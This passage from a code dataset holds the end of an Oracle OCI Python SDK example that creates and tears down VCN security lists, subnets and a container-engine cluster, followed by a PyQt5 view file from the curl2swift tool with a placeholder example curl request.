https://docs.cloud.oracle.com/Content/ContEng/Concepts/contengnetworkconfig.htm#securitylistconfig\n ################\n\n # Load balancer security rules\n load_balancer_egress_rule = oci.core.models.EgressSecurityRule(destination='0.0.0.0/0',\n destination_type=oci.core.models.EgressSecurityRule.DESTINATION_TYPE_CIDR_BLOCK,\n is_stateless=True,\n protocol='6',\n tcp_options=oci.core.models.TcpOptions())\n\n load_balancer_ingress_rule = oci.core.models.IngressSecurityRule(source='0.0.0.0/0',\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=True,\n protocol='6',\n tcp_options=oci.core.models.TcpOptions())\n\n 
load_balancers_security_list_details = oci.core.models.CreateSecurityListDetails(compartment_id=compartment_id,\n display_name='PythonCE-LB-SecurityList',\n egress_security_rules=[load_balancer_egress_rule],\n ingress_security_rules=[load_balancer_ingress_rule],\n vcn_id=vcn['id'])\n\n result = vn_composite_ops.create_security_list_and_wait_for_state(load_balancers_security_list_details,\n wait_for_states=[oci.core.models.SecurityList.LIFECYCLE_STATE_AVAILABLE])\n\n load_balancer_security_list_id = result.data.id\n print('Load Balancer Security List Id: {}'.format(load_balancer_security_list_id))\n\n # Worker security rules\n worker_egress_rules = []\n\n for i in range(number_of_worker_subnets):\n destination = subnet_template.format(10 + i)\n worker_egress_rules.append(oci.core.models.EgressSecurityRule(destination=destination,\n destination_type=oci.core.models.EgressSecurityRule.DESTINATION_TYPE_CIDR_BLOCK,\n is_stateless=True,\n protocol='all'))\n\n worker_egress_rules.append(oci.core.models.EgressSecurityRule(destination='0.0.0.0/0',\n destination_type=oci.core.models.EgressSecurityRule.DESTINATION_TYPE_CIDR_BLOCK,\n is_stateless=False,\n protocol='all'))\n worker_ingress_rules = []\n\n for i in range(number_of_worker_subnets):\n source = subnet_template.format(10 + i)\n worker_ingress_rules.append(oci.core.models.IngressSecurityRule(source=source,\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=True,\n protocol='all'))\n\n worker_ingress_rules.append(oci.core.models.IngressSecurityRule(source='0.0.0.0/0',\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=False,\n protocol='1',\n icmp_options=oci.core.models.IcmpOptions(type=3, code=4)))\n\n worker_ingress_rules.append(oci.core.models.IngressSecurityRule(source='130.35.0.0/16',\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=False,\n protocol='6',\n tcp_options=oci.core.models.TcpOptions(destination_port_range=oci.core.models.PortRange(min=22, max=22))))\n\n worker_ingress_rules.append(oci.core.models.IngressSecurityRule(source='138.1.0.0/17',\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=False,\n protocol='6',\n tcp_options=oci.core.models.TcpOptions(destination_port_range=oci.core.models.PortRange(min=22, max=22))))\n\n worker_ingress_rules.append(oci.core.models.IngressSecurityRule(source='0.0.0.0/0',\n source_type=oci.core.models.IngressSecurityRule.SOURCE_TYPE_CIDR_BLOCK,\n is_stateless=False,\n protocol='6',\n tcp_options=oci.core.models.TcpOptions(destination_port_range=oci.core.models.PortRange(min=22, max=22))))\n\n worker_security_list_details = oci.core.models.CreateSecurityListDetails(compartment_id=compartment_id,\n display_name='PythonCE-Worker-SecurityList',\n egress_security_rules=worker_egress_rules,\n ingress_security_rules=worker_ingress_rules,\n vcn_id=vcn['id'])\n\n result = vn_composite_ops.create_security_list_and_wait_for_state(worker_security_list_details,\n wait_for_states=[oci.core.models.SecurityList.LIFECYCLE_STATE_AVAILABLE])\n\n worker_security_list_id = result.data.id\n print('Worker Security List Id: {}'.format(worker_security_list_id))\n\n ################\n # Subnets\n # More information on the subnet configuration for container engine can be found here:\n # https://docs.cloud.oracle.com/Content/ContEng/Concepts/contengnetworkconfig.htm#subnetconfig\n ################\n\n # Worker subnets\n display_name_template = 
'PythonSDKCE-workers-{}'\n dns_label_template = 'workers{}'\n for i in range(number_of_worker_subnets):\n cidr_block = subnet_template.format(10 + i)\n display_name = display_name_template.format(1 + i)\n dns_label = dns_label_template.format(1 + i)\n\n subnet_details = oci.core.models.CreateSubnetDetails(compartment_id=compartment_id,\n cidr_block=cidr_block,\n display_name=display_name,\n dns_label=dns_label,\n vcn_id=vcn['id'],\n route_table_id=route_table_id,\n security_list_ids=[worker_security_list_id])\n\n result = vn_composite_ops.create_subnet_and_wait_for_state(subnet_details,\n wait_for_states=[oci.core.models.Subnet.LIFECYCLE_STATE_AVAILABLE])\n vcn['worker_subnets'].append(result.data.id)\n\n print(\"Worker Subnets: {}\".format(vcn['worker_subnets']))\n\n # Load balancer subnets\n display_name_template = 'PythonSDKCE-loadbalancers-{}'\n dns_label_template = 'loadbalancers{}'\n for i in range(number_of_lb_subnets):\n cidr_block = subnet_template.format(20 + i)\n display_name = display_name_template.format(1 + i)\n dns_label = dns_label_template.format(1 + i)\n subnet_details = oci.core.models.CreateSubnetDetails(compartment_id=compartment_id,\n cidr_block=cidr_block,\n display_name=display_name,\n dns_label=dns_label,\n vcn_id=vcn['id'],\n route_table_id=route_table_id,\n security_list_ids=[load_balancer_security_list_id])\n\n result = vn_composite_ops.create_subnet_and_wait_for_state(subnet_details,\n wait_for_states=[oci.core.models.Subnet.LIFECYCLE_STATE_AVAILABLE])\n vcn['lb_subnets'].append(result.data.id)\n\n print(\"Loadbalancer Subnets: {}\".format(vcn['lb_subnets']))\n\n return vcn\n\n\ndef delete_vcn(vn_client, vcn_resources):\n \"\"\"\n delete_vcn\n\n Deletes the example VCN. There are more resources associated\n with the VCN than passed in with the vcn_resources dictionary. Those\n resources will be discovered and deleted.\n \"\"\"\n\n vn_composite_ops = oci.core.VirtualNetworkClientCompositeOperations(vn_client)\n\n # Delete the load balancer subnets\n print(\"Deleting load balancer subnets...\")\n for subnet in vcn_resources['lb_subnets']:\n vn_composite_ops.delete_subnet_and_wait_for_state(subnet,\n wait_for_states=[oci.core.models.Subnet.LIFECYCLE_STATE_TERMINATED])\n\n # Delete the worker subnets\n print(\"Deleting worker subnets...\")\n for subnet in vcn_resources['worker_subnets']:\n vn_composite_ops.delete_subnet_and_wait_for_state(subnet,\n wait_for_states=[oci.core.models.Subnet.LIFECYCLE_STATE_TERMINATED])\n\n # VCNs have default security lists, route tables which cannot be deleted.\n # Get the details of the VCN to get the default security list and default route table ids so\n # they can be skipped when getting the security lists and route tables\n response = vn_client.get_vcn(vcn_resources['id'])\n default_security_list_id = response.data.default_security_list_id\n default_route_table_id = response.data.default_route_table_id\n\n # Retrieve and delete the security lists\n print(\"Deleting security lists...\")\n # We could just retrieve all of the security lists, but there may be cases where not all of them\n # would come back in a single page. Here is another example of using the pagaination to\n # retrieve items from a list call. 
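The deletion helper further down leans on oci.pagination.list_call_get_all_results_generator, which follows opc-next-page tokens for you and, in yield mode 'record', yields one model object at a time instead of raw responses. A minimal sketch listing subnets this way; the VCN OCID is a hypothetical placeholder:

```python
import oci

config = oci.config.from_file()
vn_client = oci.core.VirtualNetworkClient(config)

compartment_id = config["tenancy"]
vcn_id = "ocid1.vcn.oc1..example"  # hypothetical OCID for illustration

# Positional args after the yield mode are forwarded to the list call,
# keyword args likewise, so pagination stays invisible to the caller.
for subnet in oci.pagination.list_call_get_all_results_generator(
        vn_client.list_subnets, "record", compartment_id, vcn_id=vcn_id):
    print(subnet.id, subnet.lifecycle_state)
```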
More examples are in pagination.py\n for security_list in oci.pagination.list_call_get_all_results_generator(vn_client.list_security_lists,\n 'record',\n compartment_id,\n vcn_resources['id'],\n lifecycle_state=oci.core.models.SecurityList.LIFECYCLE_STATE_AVAILABLE):\n if security_list.id != default_security_list_id:\n vn_composite_ops.delete_security_list_and_wait_for_state(security_list.id,\n wait_for_states=[oci.core.models.SecurityList.LIFECYCLE_STATE_TERMINATED])\n\n # Retrieve and delete the route tables\n print(\"Deleting route tables...\")\n for route_table in oci.pagination.list_call_get_all_results_generator(vn_client.list_route_tables,\n 'record',\n compartment_id,\n vcn_resources['id'],\n lifecycle_state=oci.core.models.RouteTable.LIFECYCLE_STATE_AVAILABLE):\n if route_table.id != default_route_table_id:\n vn_composite_ops.delete_route_table_and_wait_for_state(route_table.id,\n wait_for_states=[oci.core.models.RouteTable.LIFECYCLE_STATE_TERMINATED])\n\n # Retrieve and delete the gateway\n print(\"Deleting internet gateways...\")\n for gateway in oci.pagination.list_call_get_all_results_generator(vn_client.list_internet_gateways,\n 'record',\n compartment_id,\n vcn_resources['id'],\n lifecycle_state=oci.core.models.InternetGateway.LIFECYCLE_STATE_AVAILABLE):\n vn_composite_ops.delete_internet_gateway_and_wait_for_state(gateway.id, wait_for_states=[oci.core.models.InternetGateway.LIFECYCLE_STATE_TERMINATED])\n\n print(\"Deleting virtual cloud network...\")\n response = vn_composite_ops.delete_vcn_and_wait_for_state(vcn_resources['id'],\n wait_for_states=[oci.core.models.Vcn.LIFECYCLE_STATE_TERMINATED])\n\n print(\"VCN {} has been deleted\".format(vcn_resources['id']))\n\n\n#########\n# Helpers\n#########\n\ndef get_work_request_errors(ce_client, compartment_id, work_request_id):\n \"\"\"\n get_work_request_errors\n\n Retrieves the errors for a work request and prints them.\n \"\"\"\n print_header('Work request errors:')\n response = ce_client.list_work_request_errors(compartment_id, work_request_id)\n print(response.data)\n\n\ndef print_header(header):\n \"\"\"\n print_header\n\n Prints a section header\n \"\"\"\n\n print('\\n')\n print(header)\n print(\"=\" * len(header))\n\n\nif __name__ == \"__main__\":\n # Initialize clients\n ce_client = oci.container_engine.ContainerEngineClient(config)\n vn_client = oci.core.VirtualNetworkClient(config)\n id_client = oci.identity.IdentityClient(config)\n\n # Get the Availability Domains for the compartment\n response = id_client.list_availability_domains(compartment_id)\n ads = [x.name for x in response.data]\n\n try:\n ##################\n # Create resources\n ##################\n print_header(\"Create the Virtual Cloud Network\")\n vcn_resources = create_vcn(vn_client, ads)\n print(\"VNC resources: {}\".format(vcn_resources))\n\n print_header(\"Create the Cluster\")\n cluster_success, cluster_resources = create_cluster(ce_client, vcn_resources)\n print(\"Cluster resourse: {}\".format(cluster_resources)),\n\n if cluster_success:\n print_header('Create a node pool')\n node_pool_success, node_pool_resources = create_node_pool(ce_client,\n ads,\n cluster_resources['cluster'],\n vcn_resources['worker_subnets'][0])\n print(\"Node pool resources: {}\".format(node_pool_resources))\n\n if cluster_success:\n print_header(\"Get kubeconf\")\n get_kubeconfig(ce_client, cluster_resources['cluster'])\n\n ##################\n # Update resources\n ##################\n\n if cluster_success:\n print_header(\"Update the Cluster\")\n 
update_cluster(ce_client, cluster_resources['cluster'])\n\n if cluster_success and node_pool_success:\n print_header('Update the node pool')\n update_node_pool(ce_client, node_pool_resources['nodepool'])\n\n finally:\n ####################\n # Delete resources\n ####################\n\n # Note: Any exceptions caught while trying to clean up resources are printed, but not\n # handled.\n if node_pool_resources:\n print_header('Delete the node pool')\n try:\n delete_node_pool(ce_client, node_pool_resources['nodepool'])\n except Exception as e:\n print(\"Failed to delete node pool: {}\".format(node_pool_resources['nodepool']))\n print(e)\n\n if cluster_resources:\n print_header(\"Delete the Cluster\")\n try:\n delete_cluster(ce_client, cluster_resources['cluster'])\n except Exception as e:\n print(\"Failed to delete cluster: {}\".format(cluster_resources['cluster']))\n print(e)\n\n print_header(\"Delete the Virtual Cloud Network\")\n try:\n delete_vcn(vn_client, vcn_resources)\n except Exception as e:\n print(\"Failed to delete VCN: {}\".format(vcn_resources['id']))\n print(e)\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "examples/container_engine.py", "file_name": "container_engine.py", "file_ext": "py", "file_size_in_byte": 32055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.config.from_file", "line_number": 16, "usage_type": "call"}, {"api_name": "oci.config", "line_number": 16, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.KubernetesNetworkConfig", "line_number": 36, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 36, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.ClusterCreateOptions", "line_number": 39, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 39, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.CreateClusterDetails", "line_number": 42, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 42, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 48, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 48, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 51, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 52, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 62, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.UpdateClusterDetails", "line_number": 85, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 85, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 87, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 87, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 91, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 92, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 95, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 109, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 109, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 112, "usage_type": "attribute"}, {"api_name": 
"oci.container_engine.models.NodePoolPlacementConfigDetails", "line_number": 153, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 153, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.CreateNodePoolNodeConfigDetails", "line_number": 158, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 158, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.CreateNodePoolDetails", "line_number": 164, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 164, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 173, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 173, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 176, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 177, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 185, "usage_type": "attribute"}, {"api_name": "oci.container_engine.models.UpdateNodePoolDetails", "line_number": 203, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 203, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 205, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 205, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 209, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 210, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 212, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClientCompositeOperations", "line_number": 226, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 226, "usage_type": "attribute"}, {"api_name": "oci.container_engine", "line_number": 229, "usage_type": "attribute"}, {"api_name": "oci.core.VirtualNetworkClientCompositeOperations", "line_number": 282, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 282, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateVcnDetails", "line_number": 284, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 284, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 291, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateInternetGatewayDetails", "line_number": 297, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 297, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 303, "usage_type": "attribute"}, {"api_name": "oci.core.models.RouteRule", "line_number": 309, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 309, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateRouteTableDetails", "line_number": 314, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 314, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 320, "usage_type": "attribute"}, {"api_name": "oci.core.models.EgressSecurityRule", "line_number": 332, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 332, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 333, "usage_type": "attribute"}, {"api_name": "oci.core.models.TcpOptions", "line_number": 336, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 336, "usage_type": "attribute"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 338, "usage_type": 
"call"}, {"api_name": "oci.core", "line_number": 338, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 339, "usage_type": "attribute"}, {"api_name": "oci.core.models.TcpOptions", "line_number": 342, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 342, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateSecurityListDetails", "line_number": 344, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 344, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 351, "usage_type": "attribute"}, {"api_name": "oci.core.models.EgressSecurityRule", "line_number": 361, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 361, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 362, "usage_type": "attribute"}, {"api_name": "oci.core.models.EgressSecurityRule", "line_number": 366, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 366, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 367, "usage_type": "attribute"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 374, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 374, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 375, "usage_type": "attribute"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 379, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 379, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 380, "usage_type": "attribute"}, {"api_name": "oci.core.models.IcmpOptions", "line_number": 383, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 383, "usage_type": "attribute"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 385, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 385, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 386, "usage_type": "attribute"}, {"api_name": "oci.core.models.TcpOptions", "line_number": 389, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 389, "usage_type": "attribute"}, {"api_name": "oci.core.models.PortRange", "line_number": 389, "usage_type": "call"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 391, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 391, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 392, "usage_type": "attribute"}, {"api_name": "oci.core.models.TcpOptions", "line_number": 395, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 395, "usage_type": "attribute"}, {"api_name": "oci.core.models.PortRange", "line_number": 395, "usage_type": "call"}, {"api_name": "oci.core.models.IngressSecurityRule", "line_number": 397, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 397, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 398, "usage_type": "attribute"}, {"api_name": "oci.core.models.TcpOptions", "line_number": 401, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 401, "usage_type": "attribute"}, {"api_name": "oci.core.models.PortRange", "line_number": 401, "usage_type": "call"}, {"api_name": "oci.core.models.CreateSecurityListDetails", "line_number": 403, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 403, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 410, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateSubnetDetails", "line_number": 429, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 429, "usage_type": "attribute"}, 
{"api_name": "oci.core", "line_number": 438, "usage_type": "attribute"}, {"api_name": "oci.core.models.CreateSubnetDetails", "line_number": 450, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 450, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 459, "usage_type": "attribute"}, {"api_name": "oci.core.VirtualNetworkClientCompositeOperations", "line_number": 476, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 476, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 482, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 488, "usage_type": "attribute"}, {"api_name": "oci.pagination.list_call_get_all_results_generator", "line_number": 502, "usage_type": "call"}, {"api_name": "oci.pagination", "line_number": 502, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 506, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 509, "usage_type": "attribute"}, {"api_name": "oci.pagination.list_call_get_all_results_generator", "line_number": 513, "usage_type": "call"}, {"api_name": "oci.pagination", "line_number": 513, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 517, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 520, "usage_type": "attribute"}, {"api_name": "oci.pagination.list_call_get_all_results_generator", "line_number": 524, "usage_type": "call"}, {"api_name": "oci.pagination", "line_number": 524, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 528, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 529, "usage_type": "attribute"}, {"api_name": "oci.core", "line_number": 533, "usage_type": "attribute"}, {"api_name": "oci.container_engine.ContainerEngineClient", "line_number": 567, "usage_type": "call"}, {"api_name": "oci.container_engine", "line_number": 567, "usage_type": "attribute"}, {"api_name": "oci.core.VirtualNetworkClient", "line_number": 568, "usage_type": "call"}, {"api_name": "oci.core", "line_number": 568, "usage_type": "attribute"}, {"api_name": "oci.identity.IdentityClient", "line_number": 569, "usage_type": "call"}, {"api_name": "oci.identity", "line_number": 569, "usage_type": "attribute"}]} +{"seq_id": "31293825770", "text": "from curl2swift.layers.presentation.swift_highlighter import SwiftHighlighter\nfrom curl2swift.layers.presentation.curl_highlighter import CurlHighlighter\nfrom PyQt5 import QtCore\nfrom curl2swift.layers.presentation.dynamic_parameters_selector_view import (\n DynamicParamsSelectorView,\n)\nfrom curl2swift.__main__ import main\n\nfrom curl2swift.layers.presentation.content_presenter import (\n ContentPresenter,\n ViewModel,\n)\nfrom typing import NamedTuple\n\nfrom PyQt5.QtWidgets import (\n QCheckBox,\n QFormLayout,\n QFrame,\n QHBoxLayout,\n QLabel,\n QLineEdit,\n QPlainTextEdit,\n QPushButton,\n QSplitter,\n QTabWidget,\n QVBoxLayout,\n QWidget,\n)\n\nEXAMPLE_CURL = \"\"\"\ncurl --location --request POST 'https://www.host.com/path/{pathParam}/morePath?queryParam=value' \\\\\n--header 'Accept-Encoding: gzip;q=1.0, compress;q=0.5' \\\\\n--header 'Accept-Language: en;q=1.0, cs-CZ;q=0.9' \\\\\n--header 'Content-Type: application/x-www-form-urlencoded' \\\\\n--header 'Authorization: Bearer TOKEN' \\\\\n--data-urlencode 'key_1=value_1' \\\\\n--data-urlencode 'key_2=value_2'\n\"\"\".strip()\n\n\nclass UserInput(NamedTuple):\n request_name: str\n description: str\n curl: str\n\n\nclass ContentView(QWidget):\n\n # --- Properties ---\n info_labels = []\n\n @property\n 
def user_input(self):\n request_name = self.request_name_input.text()\n description = self.description_input.text()\n curl = self.curl_text_edit.toPlainText()\n return UserInput(request_name, description, curl)\n\n # --- Init ---\n def __init__(self, screen_width):\n super().__init__()\n self.presenter = ContentPresenter(\n self.on_output_change, self.on_dynamic_values_change\n )\n self.selector = DynamicParamsSelectorView(self.presenter)\n self._layout_views()\n self._bind_interactions()\n self.curl_text_edit.setPlainText(EXAMPLE_CURL)\n\n # --- Setup ---\n def _layout_views(self):\n layout = QHBoxLayout()\n self.splitter = QSplitter()\n layout.addWidget(self.splitter)\n\n self._setup_input_part()\n self._setup_output_part()\n\n self.setLayout(layout)\n\n self.left_half_layout.addWidget(self.selector)\n\n def _setup_input_part(self):\n self.request_name_input = QLineEdit()\n self.request_name_input.setText(\"Example\")\n self.request_name_input.setMinimumWidth(200)\n self.description_input = QLineEdit()\n self.description_input.setMinimumWidth(200)\n self.curl_text_edit = QPlainTextEdit()\n self.highlight = CurlHighlighter(self.curl_text_edit.document())\n self.description_input.setText(\"Add description\")\n self.curl_label = QLabel(\"cURL:\")\n self.left_half_frame = QFrame()\n self.left_half_layout = QVBoxLayout()\n self.left_half_frame.setLayout(self.left_half_layout)\n\n form_layout = QFormLayout()\n form_layout.addRow(\"Request name: \", self.request_name_input)\n form_layout.addRow(\"Description: \", self.description_input)\n form_layout.setFormAlignment(QtCore.Qt.AlignmentFlag.AlignLeft)\n form_layout.setContentsMargins(0, 10, 0, 10)\n\n self.left_half_layout.addLayout(form_layout)\n self.left_half_layout.addWidget(self.curl_label)\n self.left_half_layout.addWidget(self.curl_text_edit)\n self.splitter.addWidget(self.left_half_frame)\n\n def _setup_output_part(self):\n self.go_button = QPushButton(\"MAKE REQUEST AND CREATE RESPONSE MAPPING\")\n self.test_with_dynamic_values_setter_checkbox = QCheckBox(\n \"Use dynamic values setter\"\n )\n self.test_with_dynamic_values_setter_checkbox.stateChanged.connect(\n self.presenter.test_with_dynamic_values_setter_checkbox_change\n )\n self.right_half_frame = QFrame()\n self.right_half_layout = QVBoxLayout()\n self.right_half_frame.setLayout(self.right_half_layout)\n self.tabs = self._get_tabs()\n self.right_half_layout.addWidget(self.tabs)\n self.splitter.addWidget(self.right_half_frame)\n\n def _get_tabs(self):\n tabs = QTabWidget()\n self.request_text_edit = SwiftHighlighter()\n self.unit_test_text_edit = SwiftHighlighter()\n tabs.addTab(\n self._create_tab([self.request_text_edit, self.go_button]),\n \"RequestSpecBuilder\",\n )\n tabs.addTab(\n self._create_tab(\n [\n self.unit_test_text_edit,\n self.test_with_dynamic_values_setter_checkbox,\n ]\n ),\n \"Unit test\",\n )\n return tabs\n\n def _create_tab(self, widgets):\n tab_widget = QWidget()\n layout = QVBoxLayout()\n for widget in widgets:\n layout.addWidget(widget)\n tab_widget.setLayout(layout)\n return tab_widget\n\n # --- Interaction binding ---\n def _bind_interactions(self):\n self.request_name_input.textChanged.connect(self._on_input_change)\n self.description_input.textChanged.connect(self._on_input_change)\n self.curl_text_edit.textChanged.connect(self._on_input_change)\n self.go_button.clicked.connect(self._on_go_button_click)\n\n def _on_input_change(self):\n self.presenter.on_input_changed(self.user_input)\n\n def _on_go_button_click(self):\n 
self.presenter.on_go_button_click()\n\n # --- Data binding ---\n def on_output_change(self, view_model: ViewModel):\n scroll_position = self.unit_test_text_edit.verticalScrollBar().value()\n self.unit_test_text_edit.setText(view_model.unit_test_tab_text)\n self.unit_test_text_edit.verticalScrollBar().setValue(scroll_position)\n\n scroll_position = self.request_text_edit.verticalScrollBar().value()\n self.request_text_edit.setText(view_model.request_tab_text)\n self.request_text_edit.verticalScrollBar().setValue(scroll_position)\n\n def on_dynamic_values_change(self, view_model: ViewModel):\n self.selector.update(view_model)\n", "repo_name": "tomnvt/curl2swift", "sub_path": "curl2swift/layers/presentation/content_view.py", "file_name": "content_view.py", "file_ext": "py", "file_size_in_byte": 6041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.NamedTuple", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 47, "usage_type": "name"}, {"api_name": "curl2swift.layers.presentation.content_presenter.ContentPresenter", "line_number": 62, "usage_type": "call"}, {"api_name": "curl2swift.layers.presentation.dynamic_parameters_selector_view.DynamicParamsSelectorView", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 72, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QSplitter", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 84, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 87, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPlainTextEdit", "line_number": 89, "usage_type": "call"}, {"api_name": "curl2swift.layers.presentation.curl_highlighter.CurlHighlighter", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 93, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 94, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFormLayout", "line_number": 97, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 100, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 109, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QCheckBox", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 117, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTabWidget", "line_number": 124, "usage_type": "call"}, {"api_name": "curl2swift.layers.presentation.swift_highlighter.SwiftHighlighter", "line_number": 125, "usage_type": "call"}, {"api_name": "curl2swift.layers.presentation.swift_highlighter.SwiftHighlighter", "line_number": 126, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 143, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 144, "usage_type": "call"}, {"api_name": "curl2swift.layers.presentation.content_presenter.ViewModel", "line_number": 164, "usage_type": "name"}, {"api_name": 